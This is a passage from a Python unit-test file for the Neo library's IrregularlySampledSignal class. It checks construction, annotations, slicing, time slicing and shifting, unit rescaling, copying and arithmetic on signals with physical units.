attrs2['array_annotations'] = arr_ann
res11 = get_fake_values(IrregularlySampledSignal, annotate=False, seed=0)
res12 = get_fake_values('IrregularlySampledSignal', annotate=False, seed=0)
res21 = get_fake_values(IrregularlySampledSignal, annotate=True, seed=0)
res22 = get_fake_values('IrregularlySampledSignal', annotate=True, seed=0)
assert_array_equal(res11.pop('times'), times)
assert_array_equal(res12.pop('times'), times)
assert_array_equal(res21.pop('times'), times)
assert_array_equal(res22.pop('times'), times)
assert_array_equal(res11.pop('signal'), signal)
assert_array_equal(res12.pop('signal'), signal)
assert_array_equal(res21.pop('signal'), signal)
assert_array_equal(res22.pop('signal'), signal)
self.assertEqual(res11, attrs1)
self.assertEqual(res12, attrs1)
# Array annotations need to be compared separately
# because numpy arrays define equality differently
arr_ann_res21 = res21.pop('array_annotations')
arr_ann_attrs2 = attrs2.pop('array_annotations')
self.assertEqual(res21, attrs2)
assert_arrays_equal(arr_ann_res21['valid'], arr_ann_attrs2['valid'])
assert_arrays_equal(arr_ann_res21['number'], arr_ann_attrs2['number'])
arr_ann_res22 = res22.pop('array_annotations')
self.assertEqual(res22, attrs2)
assert_arrays_equal(arr_ann_res22['valid'], arr_ann_attrs2['valid'])
assert_arrays_equal(arr_ann_res22['number'], arr_ann_attrs2['number'])
def test__fake_neo__cascade(self):
self.annotations['seed'] = None
obj_type = IrregularlySampledSignal
cascade = True
res = fake_neo(obj_type=obj_type, cascade=cascade)
self.assertTrue(isinstance(res, IrregularlySampledSignal))
assert_neo_object_is_compliant(res)
self.assertEqual(res.annotations, self.annotations)
def test__fake_neo__nocascade(self):
self.annotations['seed'] = None
obj_type = 'IrregularlySampledSignal'
cascade = False
res = fake_neo(obj_type=obj_type, cascade=cascade)
self.assertTrue(isinstance(res, IrregularlySampledSignal))
assert_neo_object_is_compliant(res)
self.assertEqual(res.annotations, self.annotations)
class TestIrregularlySampledSignalConstruction(unittest.TestCase):
def test_IrregularlySampledSignal_creation_times_units_signal_units(self):
params = {'test2': 'y1', 'test3': True}
arr_ann = {'anno1': [23], 'anno2': ['A']}
sig = IrregularlySampledSignal([1.1, 1.5, 1.7] * pq.ms, signal=[20., 40., 60.] * pq.mV,
name='test', description='tester', file_origin='test.file',
test1=1, array_annotations=arr_ann, **params)
sig.annotate(test1=1.1, test0=[1, 2])
assert_neo_object_is_compliant(sig)
assert_array_equal(sig.times, [1.1, 1.5, 1.7] * pq.ms)
assert_array_equal(np.asarray(sig).flatten(), np.array([20., 40., 60.]))
self.assertEqual(sig.units, pq.mV)
self.assertEqual(sig.name, 'test')
self.assertEqual(sig.description, 'tester')
self.assertEqual(sig.file_origin, 'test.file')
self.assertEqual(sig.annotations['test0'], [1, 2])
self.assertEqual(sig.annotations['test1'], 1.1)
self.assertEqual(sig.annotations['test2'], 'y1')
self.assertTrue(sig.annotations['test3'])
assert_arrays_equal(sig.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(sig.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(sig.array_annotations, ArrayDict)
def test_IrregularlySampledSignal_creation_units_arg(self):
params = {'test2': 'y1', 'test3': True}
arr_ann = {'anno1': [23], 'anno2': ['A']}
sig = IrregularlySampledSignal([1.1, 1.5, 1.7], signal=[20., 40., 60.], units=pq.V,
time_units=pq.s, name='test', description='tester',
file_origin='test.file', test1=1,
array_annotations=arr_ann, **params)
sig.annotate(test1=1.1, test0=[1, 2])
assert_neo_object_is_compliant(sig)
assert_array_equal(sig.times, [1.1, 1.5, 1.7] * pq.s)
assert_array_equal(np.asarray(sig).flatten(), np.array([20., 40., 60.]))
self.assertEqual(sig.units, pq.V)
self.assertEqual(sig.name, 'test')
self.assertEqual(sig.description, 'tester')
self.assertEqual(sig.file_origin, 'test.file')
self.assertEqual(sig.annotations['test0'], [1, 2])
self.assertEqual(sig.annotations['test1'], 1.1)
self.assertEqual(sig.annotations['test2'], 'y1')
self.assertTrue(sig.annotations['test3'])
assert_arrays_equal(sig.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(sig.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(sig.array_annotations, ArrayDict)
def test_IrregularlySampledSignal_creation_units_rescale(self):
params = {'test2': 'y1', 'test3': True}
arr_ann = {'anno1': [23], 'anno2': ['A']}
sig = IrregularlySampledSignal([1.1, 1.5, 1.7] * pq.s, signal=[2., 4., 6.] * pq.V,
units=pq.mV, time_units=pq.ms, name='test',
description='tester', file_origin='test.file', test1=1,
array_annotations=arr_ann, **params)
sig.annotate(test1=1.1, test0=[1, 2])
assert_neo_object_is_compliant(sig)
assert_array_equal(sig.times, [1100, 1500, 1700] * pq.ms)
assert_array_equal(np.asarray(sig).flatten(), np.array([2000., 4000., 6000.]))
self.assertEqual(sig.units, pq.mV)
self.assertEqual(sig.name, 'test')
self.assertEqual(sig.description, 'tester')
self.assertEqual(sig.file_origin, 'test.file')
self.assertEqual(sig.annotations['test0'], [1, 2])
self.assertEqual(sig.annotations['test1'], 1.1)
self.assertEqual(sig.annotations['test2'], 'y1')
self.assertTrue(sig.annotations['test3'])
assert_arrays_equal(sig.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(sig.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(sig.array_annotations, ArrayDict)
def test_IrregularlySampledSignal_different_lens_ValueError(self):
times = [1.1, 1.5, 1.7] * pq.ms
signal = [20., 40., 60., 70.] * pq.mV
self.assertRaises(ValueError, IrregularlySampledSignal, times, signal)
def test_IrregularlySampledSignal_no_signal_units_ValueError(self):
times = [1.1, 1.5, 1.7] * pq.ms
signal = [20., 40., 60.]
self.assertRaises(ValueError, IrregularlySampledSignal, times, signal)
def test_IrregularlySampledSignal_no_time_units_ValueError(self):
times = [1.1, 1.5, 1.7]
signal = [20., 40., 60.] * pq.mV
self.assertRaises(ValueError, IrregularlySampledSignal, times, signal)
class TestIrregularlySampledSignalProperties(unittest.TestCase):
def setUp(self):
self.times = [np.arange(10.0) * pq.s, np.arange(-100.0, 100.0, 10.0) * pq.ms,
np.arange(100) * pq.ns]
self.data = [np.arange(10.0) * pq.nA, np.arange(-100.0, 100.0, 10.0) * pq.mV,
np.random.uniform(size=100) * pq.uV]
self.signals = [IrregularlySampledSignal(t, signal=D, testattr='test') for D, t in
zip(self.data, self.times)]
def test__compliant(self):
for signal in self.signals:
assert_neo_object_is_compliant(signal)
def test__t_start_getter(self):
for signal, times in zip(self.signals, self.times):
self.assertAlmostEqual(signal.t_start, times[0], delta=1e-15)
def test__t_stop_getter(self):
for signal, times in zip(self.signals, self.times):
self.assertAlmostEqual(signal.t_stop, times[-1], delta=1e-15)
def test__duration_getter(self):
for signal, times in zip(self.signals, self.times):
self.assertAlmostEqual(signal.duration, times[-1] - times[0], delta=1e-15)
def test__sampling_intervals_getter(self):
for signal, times in zip(self.signals, self.times):
assert_arrays_almost_equal(signal.sampling_intervals, np.diff(times), threshold=1e-15)
def test_IrregularlySampledSignal_repr(self):
sig = IrregularlySampledSignal([1.1, 1.5, 1.7] * pq.s, signal=[2., 4., 6.] * pq.V,
name='test', description='tester', file_origin='test.file',
test1=1)
assert_neo_object_is_compliant(sig)
if np.__version__.split(".")[:2] > ['1', '13']:
# see https://github.com/numpy/numpy/blob/master/doc/release/1.14.0-notes.rst#many
# -changes-to-array-printing-disableable-with-the-new-legacy-printing-mode
targ = (
'<IrregularlySampledSignal(array([[2.],\n [4.],\n [6.]]) * V '
'' + 'at times [1.1 1.5 1.7] s)>')
else:
targ = (
'<IrregularlySampledSignal(array([[ 2.],\n [ 4.],\n [ 6.]]) '
'* V ' + 'at times [ 1.1 1.5 1.7] s)>')
res = repr(sig)
self.assertEqual(targ, res)
class TestIrregularlySampledSignalArrayMethods(unittest.TestCase):
def setUp(self):
self.data1 = np.arange(10.0)
self.data1quant = self.data1 * pq.mV
self.time1 = np.logspace(1, 5, 10)
self.time1quant = self.time1 * pq.ms
self.arr_ann = {'anno1': [23], 'anno2': ['A']}
self.signal1 = IrregularlySampledSignal(self.time1quant, signal=self.data1quant,
name='spam', description='eggs',
file_origin='testfile.txt', arg1='test',
array_annotations=self.arr_ann)
self.signal1.segment = Segment()
self.signal1.channel_index = ChannelIndex([0])
def test__compliant(self):
assert_neo_object_is_compliant(self.signal1)
self.assertEqual(self.signal1.name, 'spam')
self.assertEqual(self.signal1.description, 'eggs')
self.assertEqual(self.signal1.file_origin, 'testfile.txt')
self.assertEqual(self.signal1.annotations, {'arg1': 'test'})
assert_arrays_equal(self.signal1.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(self.signal1.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(self.signal1.array_annotations, ArrayDict)
def test__slice_should_return_IrregularlySampledSignal(self):
result = self.signal1[3:8]
self.assertIsInstance(result, IrregularlySampledSignal)
assert_neo_object_is_compliant(result)
self.assertEqual(result.name, 'spam')
self.assertEqual(result.description, 'eggs')
self.assertEqual(result.file_origin, 'testfile.txt')
self.assertEqual(result.annotations, {'arg1': 'test'})
self.assertEqual(result.size, 5)
self.assertEqual(result.t_start, self.time1quant[3])
self.assertEqual(result.t_stop, self.time1quant[7])
assert_array_equal(self.time1quant[3:8], result.times)
assert_array_equal(self.data1[3:8].reshape(-1, 1), result.magnitude)
# Test other attributes were copied over (in this case, defaults)
self.assertEqual(result.file_origin, self.signal1.file_origin)
self.assertEqual(result.name, self.signal1.name)
self.assertEqual(result.description, self.signal1.description)
self.assertEqual(result.annotations, self.signal1.annotations)
assert_arrays_equal(result.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(result.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(result.array_annotations, ArrayDict)
def test__getitem_should_return_single_quantity(self):
self.assertEqual(self.signal1[0], 0 * pq.mV)
self.assertEqual(self.signal1[9], 9 * pq.mV)
self.assertRaises(IndexError, self.signal1.__getitem__, 10)
def test__getitem_out_of_bounds_IndexError(self):
self.assertRaises(IndexError, self.signal1.__getitem__, 10)
def test_comparison_operators(self):
assert_array_equal(self.signal1 >= 5 * pq.mV, np.array(
[[False, False, False, False, False, True, True, True, True, True]]).T)
assert_array_equal(self.signal1 == 5 * pq.mV, np.array(
[[False, False, False, False, False, True, False, False, False, False]]).T)
assert_array_equal(self.signal1 == self.signal1, np.array(
[[True, True, True, True, True, True, True, True, True, True]]).T)
def test__comparison_as_indexing_single_trace(self):
self.assertEqual(self.signal1[self.signal1 == 5], [5 * pq.mV])
def test__comparison_as_indexing_multi_trace(self):
signal = IrregularlySampledSignal(self.time1quant, np.arange(20).reshape((-1, 2)) * pq.V)
assert_array_equal(signal[signal < 10],
np.array([[0, 2, 4, 6, 8], [1, 3, 5, 7, 9]]).T * pq.V)
def test__indexing_keeps_order_across_channels(self):
# AnalogSignals with 10 traces each having 5 samples (eg. data[0] = [0,10,20,30,40])
data = np.array([range(10), range(10, 20), range(20, 30), range(30, 40), range(40, 50)])
mask = np.full((5, 10), fill_value=False, dtype=bool)
# selecting one entry per trace
mask[[0, 1, 0, 3, 0, 2, 4, 3, 1, 4], range(10)] = True
signal = IrregularlySampledSignal(np.arange(5) * pq.s, np.array(data) * pq.V)
assert_array_equal(signal[mask], np.array([[0, 11, 2, 33, 4, 25, 46, 37, 18, 49]]) * pq.V)
def test__indexing_keeps_order_across_time(self):
# AnalogSignals with 10 traces each having 5 samples (eg. data[0] = [0,10,20,30,40])
data = np.array([range(10), range(10, 20), range(20, 30), range(30, 40), range(40, 50)])
mask = np.full((5, 10), fill_value=False, dtype=bool)
# selecting two entries per trace
temporal_ids = [0, 1, 0, 3, 1, 2, 4, 2, 1, 4] + [4, 3, 2, 1, 0, 1, 2, 3, 2, 1]
mask[temporal_ids, list(range(10)) + list(range(10))] = True
signal = IrregularlySampledSignal(np.arange(5) * pq.s, np.array(data) * pq.V)
assert_array_equal(signal[mask], np.array([[0, 11, 2, 13, 4, 15, 26, 27, 18, 19],
[40, 31, 22, 33, 14, 25, 46, 37, 28,
49]]) * pq.V)
def test__comparison_with_inconsistent_units_should_raise_Exception(self):
self.assertRaises(ValueError, self.signal1.__gt__, 5 * pq.nA)
def test_simple_statistics(self):
targmean = self.signal1[:-1] * np.diff(self.time1quant).reshape(-1, 1)
targmean = targmean.sum() / (self.time1quant[-1] - self.time1quant[0])
self.assertEqual(self.signal1.max(), 9 * pq.mV)
self.assertEqual(self.signal1.min(), 0 * pq.mV)
self.assertEqual(self.signal1.mean(), targmean)
def test_mean_interpolation_NotImplementedError(self):
self.assertRaises(NotImplementedError, self.signal1.mean, True)
def test_resample_NotImplementedError(self):
self.assertRaises(NotImplementedError, self.signal1.resample, True)
def test__rescale_same(self):
result = self.signal1.copy()
result = result.rescale(pq.mV)
self.assertIsInstance(result, IrregularlySampledSignal)
assert_neo_object_is_compliant(result)
self.assertEqual(result.name, 'spam')
self.assertEqual(result.description, 'eggs')
self.assertEqual(result.file_origin, 'testfile.txt')
self.assertEqual(result.annotations, {'arg1': 'test'})
assert_arrays_equal(result.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(result.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(result.array_annotations, ArrayDict)
self.assertEqual(result.units, 1 * pq.mV)
assert_array_equal(result.magnitude, self.data1.reshape(-1, 1))
assert_array_equal(result.times, self.time1quant)
assert_same_sub_schema(result, self.signal1)
self.assertIsInstance(result.channel_index, ChannelIndex)
self.assertIsInstance(result.segment, Segment)
self.assertIs(result.channel_index, self.signal1.channel_index)
self.assertIs(result.segment, self.signal1.segment)
def test__rescale_new(self):
result = self.signal1.copy()
result = result.rescale(pq.uV)
self.assertIsInstance(result, IrregularlySampledSignal)
assert_neo_object_is_compliant(result)
self.assertEqual(result.name, 'spam')
self.assertEqual(result.description, 'eggs')
self.assertEqual(result.file_origin, 'testfile.txt')
self.assertEqual(result.annotations, {'arg1': 'test'})
assert_arrays_equal(result.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(result.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(result.array_annotations, ArrayDict)
self.assertEqual(result.units, 1 * pq.uV)
assert_arrays_almost_equal(np.array(result), self.data1.reshape(-1, 1) * 1000., 1e-10)
assert_array_equal(result.times, self.time1quant)
self.assertIsInstance(result.channel_index, ChannelIndex)
self.assertIsInstance(result.segment, Segment)
self.assertIs(result.channel_index, self.signal1.channel_index)
self.assertIs(result.segment, self.signal1.segment)
def test__rescale_new_incompatible_ValueError(self):
self.assertRaises(ValueError, self.signal1.rescale, pq.nA)
def test_time_slice(self):
targdataquant = [[1.0], [2.0], [3.0]] * pq.mV
targtime = np.logspace(1, 5, 10)
targtimequant = targtime[1:4] * pq.ms
targ_signal = IrregularlySampledSignal(targtimequant, signal=targdataquant, name='spam',
description='eggs', file_origin='testfile.txt',
arg1='test')
t_start = 15
t_stop = 250
result = self.signal1.time_slice(t_start, t_stop)
assert_array_equal(result, targ_signal)
assert_array_equal(result.times, targtimequant)
self.assertEqual(result.units, 1 * pq.mV)
self.assertIsInstance(result, IrregularlySampledSignal)
assert_neo_object_is_compliant(result)
self.assertEqual(result.name, 'spam')
self.assertEqual(result.description, 'eggs')
self.assertEqual(result.file_origin, 'testfile.txt')
self.assertEqual(result.annotations, {'arg1': 'test'})
assert_arrays_equal(result.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(result.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(result.array_annotations, ArrayDict)
def test__time_slice_deepcopy_annotations(self):
params1 = {'test0': 'y1', 'test1': ['deeptest'], 'test2': True}
self.signal1.annotate(**params1)
result = self.signal1.time_slice(None, None)
# Change annotations of original
params2 = {'test0': 'y2', 'test2': False}
self.signal1.annotate(**params2)
self.signal1.annotations['test1'][0] = 'shallowtest'
self.assertNotEqual(self.signal1.annotations['test0'], result.annotations['test0'])
self.assertNotEqual(self.signal1.annotations['test1'], result.annotations['test1'])
self.assertNotEqual(self.signal1.annotations['test2'], result.annotations['test2'])
# Change annotations of result
params3 = {'test0': 'y3'}
result.annotate(**params3)
result.annotations['test1'][0] = 'shallowtest2'
self.assertNotEqual(self.signal1.annotations['test0'], result.annotations['test0'])
self.assertNotEqual(self.signal1.annotations['test1'], result.annotations['test1'])
self.assertNotEqual(self.signal1.annotations['test2'], result.annotations['test2'])
def test__time_slice_deepcopy_array_annotations(self):
length = self.signal1.shape[-1]
params1 = {'test0': ['y{}'.format(i) for i in range(length)],
'test1': ['deeptest' for i in range(length)],
'test2': [(-1)**i > 0 for i in range(length)]}
self.signal1.array_annotate(**params1)
result = self.signal1.time_slice(None, None)
# Change annotations of original
params2 = {'test0': ['x{}'.format(i) for i in range(length)],
'test2': [(-1) ** (i + 1) > 0 for i in range(length)]}
self.signal1.array_annotate(**params2)
self.signal1.array_annotations['test1'][0] = 'shallowtest'
self.assertFalse(all(self.signal1.array_annotations['test0']
== result.array_annotations['test0']))
self.assertFalse(all(self.signal1.array_annotations['test1']
== result.array_annotations['test1']))
self.assertFalse(all(self.signal1.array_annotations['test2']
== result.array_annotations['test2']))
# Change annotations of result
params3 = {'test0': ['z{}'.format(i) for i in range(1, result.shape[-1]+1)]}
result.array_annotate(**params3)
result.array_annotations['test1'][0] = 'shallow2'
self.assertFalse(all(self.signal1.array_annotations['test0']
== result.array_annotations['test0']))
self.assertFalse(all(self.signal1.array_annotations['test1']
== result.array_annotations['test1']))
self.assertFalse(all(self.signal1.array_annotations['test2']
== result.array_annotations['test2']))
def test__time_slice_deepcopy_data(self):
result = self.signal1.time_slice(None, None)
# Change values of original array
self.signal1[2] = 7.3*self.signal1.units
self.assertFalse(all(self.signal1 == result))
# Change values of sliced array
result[3] = 9.5*result.units
self.assertFalse(all(self.signal1 == result))
def test_time_slice_out_of_boundries(self):
targdataquant = self.data1quant
targtimequant = self.time1quant
targ_signal = IrregularlySampledSignal(targtimequant, signal=targdataquant, name='spam',
description='eggs', file_origin='testfile.txt',
arg1='test')
t_start = 0
t_stop = 2500000
result = self.signal1.time_slice(t_start, t_stop)
assert_array_equal(result, targ_signal)
assert_array_equal(result.times, targtimequant)
self.assertEqual(result.units, 1 * pq.mV)
self.assertIsInstance(result, IrregularlySampledSignal)
assert_neo_object_is_compliant(result)
self.assertEqual(result.name, 'spam')
self.assertEqual(result.description, 'eggs')
self.assertEqual(result.file_origin, 'testfile.txt')
self.assertEqual(result.annotations, {'arg1': 'test'})
assert_arrays_equal(result.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(result.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(result.array_annotations, ArrayDict)
def test_time_slice_empty(self):
targdataquant = [] * pq.mV
targtimequant = [] * pq.ms
targ_signal = IrregularlySampledSignal(targtimequant, signal=targdataquant, name='spam',
description='eggs', file_origin='testfile.txt',
arg1='test')
t_start = 15
t_stop = 250
result = targ_signal.time_slice(t_start, t_stop)
assert_array_equal(result, targ_signal)
assert_array_equal(result.times, targtimequant)
self.assertEqual(result.units, 1 * pq.mV)
self.assertIsInstance(result, IrregularlySampledSignal)
assert_neo_object_is_compliant(result)
self.assertEqual(result.name, 'spam')
self.assertEqual(result.description, 'eggs')
self.assertEqual(result.file_origin, 'testfile.txt')
self.assertEqual(result.annotations, {'arg1': 'test'})
self.assertEqual(result.array_annotations, {})
self.assertIsInstance(result.array_annotations, ArrayDict)
def test_time_slice_none_stop(self):
targdataquant = [[1.0], [2.0], [3.0], [4.0], [5.0], [6.0], [7.0], [8.0], [9.0]] * pq.mV
targtime = np.logspace(1, 5, 10)
targtimequant = targtime[1:10] * pq.ms
targ_signal = IrregularlySampledSignal(targtimequant, signal=targdataquant, name='spam',
description='eggs', file_origin='testfile.txt',
arg1='test')
t_start = 15
t_stop = None
result = self.signal1.time_slice(t_start, t_stop)
assert_array_equal(result, targ_signal)
assert_array_equal(result.times, targtimequant)
self.assertEqual(result.units, 1 * pq.mV)
self.assertIsInstance(result, IrregularlySampledSignal)
assert_neo_object_is_compliant(result)
self.assertEqual(result.name, 'spam')
self.assertEqual(result.description, 'eggs')
self.assertEqual(result.file_origin, 'testfile.txt')
self.assertEqual(result.annotations, {'arg1': 'test'})
assert_arrays_equal(result.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(result.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(result.array_annotations, ArrayDict)
def test_time_slice_none_start(self):
targdataquant = [[0.0], [1.0], [2.0], [3.0]] * pq.mV
targtime = np.logspace(1, 5, 10)
targtimequant = targtime[0:4] * pq.ms
targ_signal = IrregularlySampledSignal(targtimequant, signal=targdataquant, name='spam',
description='eggs', file_origin='testfile.txt',
arg1='test')
t_start = None
t_stop = 250
result = self.signal1.time_slice(t_start, t_stop)
assert_array_equal(result, targ_signal)
assert_array_equal(result.times, targtimequant)
self.assertEqual(result.units, 1 * pq.mV)
self.assertIsInstance(result, IrregularlySampledSignal)
assert_neo_object_is_compliant(result)
self.assertEqual(result.name, 'spam')
self.assertEqual(result.description, 'eggs')
self.assertEqual(result.file_origin, 'testfile.txt')
self.assertEqual(result.annotations, {'arg1': 'test'})
assert_arrays_equal(result.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(result.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(result.array_annotations, ArrayDict)
def test_time_slice_none_both(self):
targdataquant = [[0.0], [1.0], [2.0], [3.0], [4.0], [5.0], [6.0], [7.0], [8.0],
[9.0]] * pq.mV
targtime = np.logspace(1, 5, 10)
targtimequant = targtime[0:10] * pq.ms
targ_signal = IrregularlySampledSignal(targtimequant, signal=targdataquant, name='spam',
description='eggs', file_origin='testfile.txt',
arg1='test')
t_start = None
t_stop = None
result = self.signal1.time_slice(t_start, t_stop)
assert_array_equal(result, targ_signal)
assert_array_equal(result.times, targtimequant)
self.assertEqual(result.units, 1 * pq.mV)
self.assertIsInstance(result, IrregularlySampledSignal)
assert_neo_object_is_compliant(result)
self.assertEqual(result.name, 'spam')
self.assertEqual(result.description, 'eggs')
self.assertEqual(result.file_origin, 'testfile.txt')
self.assertEqual(result.annotations, {'arg1': 'test'})
assert_arrays_equal(result.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(result.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(result.array_annotations, ArrayDict)
def test_time_slice_differnt_units(self):
targdataquant = [[1.0], [2.0], [3.0]] * pq.mV
targtime = np.logspace(1, 5, 10)
targtimequant = targtime[1:4] * pq.ms
targ_signal = IrregularlySampledSignal(targtimequant, signal=targdataquant, name='spam',
description='eggs', file_origin='testfile.txt',
arg1='test')
t_start = 15
t_stop = 250
t_start = 0.015 * pq.s
t_stop = .250 * pq.s
result = self.signal1.time_slice(t_start, t_stop)
assert_array_equal(result, targ_signal)
assert_array_equal(result.times, targtimequant)
self.assertEqual(result.units, 1 * pq.mV)
self.assertIsInstance(result, IrregularlySampledSignal)
assert_neo_object_is_compliant(result)
self.assertEqual(result.name, 'spam')
self.assertEqual(result.description, 'eggs')
self.assertEqual(result.file_origin, 'testfile.txt')
self.assertEqual(result.annotations, {'arg1': 'test'})
assert_arrays_equal(result.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(result.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(result.array_annotations, ArrayDict)
def test__time_slice_should_set_parents_to_None(self):
# When timeslicing, a deep copy is made,
# thus the reference to parent objects should be destroyed
result = self.signal1.time_slice(1 * pq.ms, 3 * pq.ms)
self.assertEqual(result.segment, None)
self.assertEqual(result.channel_index, None)
def test__deepcopy_should_set_parents_objects_to_None(self):
# Deepcopy should destroy references to parents
result = deepcopy(self.signal1)
self.assertEqual(result.segment, None)
self.assertEqual(result.channel_index, None)
def test__time_shift_same_attributes(self):
result = self.signal1.time_shift(1 * pq.ms)
assert_same_attributes(result, self.signal1, exclude=['times', 't_start', 't_stop'])
def test__time_shift_same_annotations(self):
result = self.signal1.time_shift(1 * pq.ms)
assert_same_annotations(result, self.signal1)
def test__time_shift_same_array_annotations(self):
result = self.signal1.time_shift(1 * pq.ms)
assert_same_array_annotations(result, self.signal1)
def test__time_shift_should_set_parents_to_None(self):
# When time-shifting, a deep copy is made,
# thus the reference to parent objects should be destroyed
result = self.signal1.time_shift(1 * pq.ms)
self.assertEqual(result.segment, None)
self.assertEqual(result.channel_index, None)
def test__time_shift_by_zero(self):
shifted = self.signal1.time_shift(0 * pq.ms)
assert_arrays_equal(shifted.times, self.signal1.times)
def test__time_shift_same_units(self):
shifted = self.signal1.time_shift(10 * pq.ms)
assert_arrays_equal(shifted.times, self.signal1.times + 10 * pq.ms)
def test__time_shift_different_units(self):
shifted = self.signal1.time_shift(1 * pq.s)
assert_arrays_equal(shifted.times, self.signal1.times + 1000 * pq.ms)
def test_as_array(self):
sig_as_arr = self.signal1.as_array()
self.assertIsInstance(sig_as_arr, np.ndarray)
assert_array_equal(self.data1, sig_as_arr.flat)
def test_as_quantity(self):
sig_as_q = self.signal1.as_quantity()
self.assertIsInstance(sig_as_q, pq.Quantity)
assert_array_equal(self.data1, sig_as_q.magnitude.flat)
def test__copy_should_preserve_parent_objects(self):
result = self.signal1.copy()
self.assertIs(result.segment, self.signal1.segment)
self.assertIs(result.channel_index, self.signal1.channel_index)
class TestIrregularlySampledSignalCombination(unittest.TestCase):
def setUp(self):
self.data1 = np.arange(10.0)
self.data1quant = self.data1 * pq.mV
self.time1 = np.logspace(1, 5, 10)
self.time1quant = self.time1 * pq.ms
self.arr_ann = {'anno1': [23], 'anno2': ['A']}
self.signal1 = IrregularlySampledSignal(self.time1quant, signal=self.data1quant,
name='spam', description='eggs',
file_origin='testfile.txt', arg1='test',
array_annotations=self.arr_ann)
def test__compliant(self):
assert_neo_object_is_compliant(self.signal1)
self.assertEqual(self.signal1.name, 'spam')
self.assertEqual(self.signal1.description, 'eggs')
self.assertEqual(self.signal1.file_origin, 'testfile.txt')
self.assertEqual(self.signal1.annotations, {'arg1': 'test'})
assert_arrays_equal(self.signal1.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(self.signal1.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(self.signal1.array_annotations, ArrayDict)
def test__add_const_quantity_should_preserve_data_complement(self):
result = self.signal1 + 0.065 * pq.V
self.assertIsInstance(result, IrregularlySampledSignal)
assert_neo_object_is_compliant(result)
self.assertEqual(result.name, 'spam')
self.assertEqual(result.description, 'eggs')
self.assertEqual(result.file_origin, 'testfile.txt')
self.assertEqual(result.annotations, {'arg1': 'test'})
assert_arrays_equal(result.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(result.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(result.array_annotations, ArrayDict)
assert_array_equal(result.magnitude, self.data1.reshape(-1, 1) + 65)
assert_array_equal(result.times, self.time1quant)
self.assertEqual(self.signal1[9], 9 * pq.mV)
self.assertEqual(result[9], 74 * pq.mV)
def test__add_two_consistent_signals_should_preserve_data_complement(self):
data2 = np.arange(10.0, 20.0)
data2quant = data2 * pq.mV
signal2 = IrregularlySampledSignal(self.time1quant, signal=data2quant)
assert_neo_object_is_compliant(signal2)
result = self.signal1 + signal2
self.assertIsInstance(result, IrregularlySampledSignal)
assert_neo_object_is_compliant(result)
self.assertEqual(result.name, 'spam')
self.assertEqual(result.description, 'eggs')
self.assertEqual(result.file_origin, 'testfile.txt')
self.assertEqual(result.annotations, {'arg1': 'test'})
assert_arrays_equal(result.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(result.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(result.array_annotations, ArrayDict)
targ = IrregularlySampledSignal(self.time1quant, signal=np.arange(10.0, 30.0, 2.0),
units="mV", name='spam', description='eggs',
file_origin='testfile.txt', arg1='test')
assert_neo_object_is_compliant(targ)
assert_array_equal(result, targ)
assert_array_equal(self.time1quant, targ.times)
assert_array_equal(result.times, targ.times)
assert_same_sub_schema(result, targ)
def test__add_signals_with_inconsistent_times_AssertionError(self):
signal2 = IrregularlySampledSignal(self.time1quant * 2., signal=np.arange(10.0),
units="mV")
assert_neo_object_is_compliant(signal2)
self.assertRaises(ValueError, self.signal1.__add__, signal2)
def test__add_signals_with_inconsistent_dimension_ValueError(self):
signal2 = np.arange(20).reshape(2, 10)
self.assertRaises(ValueError, self.signal1.__add__, signal2)
def test__subtract_const_should_preserve_data_complement(self):
result = self.signal1 - 65 * pq.mV
self.assertIsInstance(result, IrregularlySampledSignal)
assert_neo_object_is_compliant(result)
self.assertEqual(result.name, 'spam')
self.assertEqual(result.description, 'eggs')
self.assertEqual(result.file_origin, 'testfile.txt')
self.assertEqual(result.annotations, {'arg1': 'test'})
assert_arrays_equal(result.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(result.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(result.array_annotations, ArrayDict)
self.assertEqual(self.signal1[9], 9 * pq.mV)
self.assertEqual(result[9], -56 * pq.mV)
assert_array_equal(result.magnitude, (self.data1 - 65).reshape(-1, 1))
assert_array_equal(result.times, self.time1quant)
def test__subtract_from_const_should_return_signal(self):
result = 10 * pq.mV - self.signal1
self.assertIsInstance(result, IrregularlySampledSignal)
assert_neo_object_is_compliant(result)
self.assertEqual(result.name, 'spam')
self.assertEqual(result.description, 'eggs')
self.assertEqual(result.file_origin, 'testfile.txt')
self.assertEqual(result.annotations, {'arg1': 'test'})
assert_arrays_equal(result.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(result.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(result.array_annotations, ArrayDict)
self.assertEqual(self.signal1[9], 9 * pq.mV)
self.assertEqual(result[9], 1 * pq.mV)
assert_array_equal(result.magnitude, (10 - self.data1).reshape(-1, 1))
assert_array_equal(result.times, self.time1quant)
def test__mult_signal_by_const_float_should_preserve_data_complement(self):
result = self.signal1 * 2.
